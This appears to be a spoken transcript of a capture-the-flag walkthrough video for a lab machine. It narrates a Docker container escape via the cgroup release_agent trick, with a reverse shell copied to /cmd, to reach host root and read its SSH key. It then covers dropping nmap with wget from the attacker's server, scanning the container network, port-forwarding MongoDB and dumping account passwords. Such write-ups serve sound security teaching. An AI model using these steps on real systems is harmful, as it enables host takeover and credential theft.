/mount was empty. Now /mount has the cgroup. So I'm going to make dir /mount ipsec. And if I look in this, we can see the cgroup as well. I'm going to echo 1 to mount ipsec notify on release. Oh, it errored out as I was saying that. So I'm not going to do tab autocomplete here. So echo 1 to mount ipsec notify on release. And this is what will enable us to trigger our code execution. So now that that is set, we need to get where the file exists because this is getting executed on the root file system. So if I cat etc mtab, this is going to show like the file system. I'm just going to grep for overlayfs. Overlay, not fs. And we can see where it exists. So this directory is where the actual file system exists on the host. If I go to SSH, let's see, this is that was Zoiper. Here's SSH. I probably don't have permission to this directory. Let's see. Can we just go to overlay 2? Overlay 2. I can't. But if we did look in this directory, this is going to be where all like the Docker file systems are. So we want to grab the upper directory, I believe, where the diff is. And we have to be relatively quick here because there's something running every minute. I should play safe now. So let's see. I want to, what is it? Echo. Let's see. Let's fix my terminal. I thought I did this. Maybe I just didn't do it on the root shell. STTY rows 26 calls 125, I believe. Now when I paste this, that looks fine. No, it doesn't. Is that right? 105 is columns. There we go. When I paste this, okay, that looks better. So now what I want to do is echo that directory /cmd. And this is going to be a file I create on the box. And I'm going to write that to release. Oh, shoot. I think that just said release agent. So now when I trigger the notify on release, which I already set to 1, it's going to execute this cmd command on the host. If I just do ls/, there is no cmd. So I'm going to copy my reverse shell from earlier, this ipsec.sh, to /cmd. If I just do this, we can see that exists now. I'm going to give it executable. And if I chmod plus x, cat /cmd, we can see it's just my bash script. So now the next step is, I think we just echo this to mount ipsec. Man, this is annoying not having tab autocomplete. To mount ipsec cgroup.prox and see lvmp 9001. When I run this command, let's see, I'm guessing the minute happened and ipsec got deleted, which is annoying. So let's do history, ls/. So we don't have anything here. Let's create a new window and let's just copy and paste everything in that we want to do. So if we had this scripted out, it becomes easy, but because we don't have it scripted out, it's a major pain. So we want to copy this, then chmod plus x cmd. So this sets up our command execution. Now we'll want to make dir mount ipsec, and then echo 1 to mount ipsec, notify on release. And then we need to, let's see, is mount release agent still the same? It is not. So we want to echo this to release agent. Like this. And then I'm just going to do bin sh-c echo to mount ipsec cgroup.prox. As long as I copied everything correctly, this should work. So what's happening here, we copy our shell to /cmd, create the directory ipsec, tell overlayfs to notify on release, so we get code execution when the process dies. And now we're going to tell it where to execute code, which is that cmd. And yeah, that should be all she wrote. So let's copy this and hope it works. Copy, paste, and there we go. We got root at Carpediem. So cd/root.sh, and we can cat id rsa, and if I wanted to, I can ssh in as root, but I don't think we have to do that to show the one piece I wanted to, which was the dumping the Mongo database, so we can skip the whole help desk enumeration thing. And I'm going to do it from the SSH connection just because it's easier. There's nothing that stops you from doing this from that very first Docker container. So I want to install the static Nmap. So static Nmap binary go to Google. We can download this. Once it loads, download, save, and let's put this in a directory, www, move, downloads, nmap, here, right? So Python 3-m HTTP server, wget 10.10.14.8, 8000 nmap. So we're installing nmap to this box. We're not installing it, just dropping it. And you could use like proxy chains and nmap, but whenever you like proxy and nmap, it's just bad, right? So we knew when we were in the Docker container, because of the proc net TCP file, our IP was 172.17, I want to say 0.6. So I'm just going to do an nmap on 172.17.0. We know 1 is the router, but we can keep that. So I'll do 1.5, right? Or 1 to 6. And I should say --open. And we can also do -v so it shows up open ports as it finds them. And -n so we don't do DNS. There we go. That's so much quicker without DNS. And we can see all the ports on each of these containers. We have MySQL on 0.2. 0.4 has FTP, HTTP, and HTTPS. And I want to say if we did a full port scan on 0.4, it has some more things. Let's see, -p-, see what happens. Maybe not. Wow, that is really quick. Let's do 1 to 8, I guess. We have 33060 on 0.2. See. Port 8118. I don't know what port that is. Let's see. Port 8118. It's not exactly saying what it is. Let's check for other ones. 27017. So let's copy this. Search for this. And we see this is MongoDB. So if we forwarded the port, then we could execute Mongo commands on this if there's no authentication. I'm going to see if Mongo exists on this host. It does not. Let's see, do I have Mongo? I do not. Sudo apt install Mongo, MongoDB, apt search Mongo. If I can type, let's see. libmongo MongoD MongoSH. Maybe that's what I want. Yeah, that looks fine. So we want to forward port 27017. So -L 27017 172.17. What was that port or the host? 8118. Think 0.3. 0.3 27017. So now that's forwarded. We do mongosh and we can connect to this DB. So from here, we can just type like show DBs and see all the databases. We see admin, config, local, TrueDesk. So if I do use TrueDesk, then we can show collections, and this will list all the databases here. So we should be able to just do db dot the database. So let's see, tickets dot find, and dump every ticket this way. So if you didn't want to enumerate the actual TrueDesk API, you could have done Mongo dumps this way. We could also think accounts. So what was it? db.accounts.find. And we can dump passwords as well. So you could enumerate the Mongo database if you didn't want to do that. So with that being said, that's going to be the box. Hope you enjoyed it. Take care, and I will see you all next time.